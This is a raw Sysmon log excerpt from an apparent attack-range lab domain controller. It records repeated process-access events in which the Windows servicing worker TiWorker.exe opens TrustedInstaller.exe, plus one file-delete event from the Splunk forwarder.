12:02:25.979{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.979{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.963{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F30730F8B66C555FA940B332B9E506FB,SHA256=6972671557DFC063E47AAD1D3543F54CA0F3DE9E577AB29D402E20468494152F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.